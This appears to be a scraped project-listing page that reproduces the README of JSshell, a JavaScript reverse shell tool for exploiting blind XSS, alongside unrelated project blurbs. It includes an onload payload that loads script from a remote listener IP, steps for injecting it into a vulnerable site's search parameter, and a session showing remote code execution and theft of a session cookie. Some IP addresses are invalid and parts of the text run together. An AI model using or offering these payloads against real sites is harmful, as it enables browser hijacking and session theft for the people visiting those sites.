dont-track-me-google
Firefox and Chrome extensions to prevent Google from making links ugly.
JSshell - JavaScript reverse/remote shell
git clone https://github.com/shelld3v/JSshell.gitshelld3v/JSshellJSshell - a JavaScript reverse shell. This is used for executing JS code remotely, exploiting blind XSS, ...
Requirements: Any OS + Python 2 or Python 3
Updated in the new version of JShell 3.1:
snippet -> allows to write a snippet of javascript code>>> snippet
Use CTRL+D to finish the snippet
function new() {
new = 'New update: Support javascript snippet =)';
confirm(new)
}
new()
>>>
<body> reverse shell payload-g-p-s-w-cjsh.pyjsh.py -gjsh.py -p 1234jsh.py -s 48.586.1.23 -gjsh.py -c "alert(document.cookie)" -w 10This is a step-by-step example of how to use JSshell.
First, we need to generate a reverse JS shell payload and set the shell timeout (e.g. 20 seconds):
~# whoami
root
~# ls
README.md jsh.py
~# python3 jsh.py -g -w 20
__
|(_ _ |_ _ | |
\_|__)_> | |(/_ | |
v1.0
Payload:
<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},999)>
Listening on [any] 4848 for incoming JS shell ...
Now paste this payload to the website:
https://vulnwebs1te.com/b/search?q=<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},1248)>
Access the page and we will have the reverse JS shell:
__
|(_ _ |_ _ | |
\_|__)_> | |(/_ | |
v1.0
Payload:
<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},999)>
Listening on [any] 4848 for incoming JS shell ...
Got JS shell from [75.433.24.128] port 39154 to DESKTOP-1GSL2O2 4848
$ established
$ the
$ shell
$
$
$ help
JSshell using javascript code as shell commands. Also supports some commands:
help This help
exit, quit Exit the JS shell
$
Let execute some commands:
$ var test = 'controlled'
$ confirm(test)
$
And an alert will be popped up: controlled
$ prompt(document.cookie)
$
And the browser will print the user cookies: JSESSION=3bda8...
$ exit
~# whoami
root
~# pwd
/home/shelld3v
~#
Now quited!
This is created by shelld3v!
more like this
Firefox and Chrome extensions to prevent Google from making links ugly.
meine 🌒 - A CLI file manager and system utility built with Textual. It combines intuitive command parsing with rich t…
Launcher and management utility for running an Astroneer Dedicated Server on Linux using WINE
search projects, people, and tags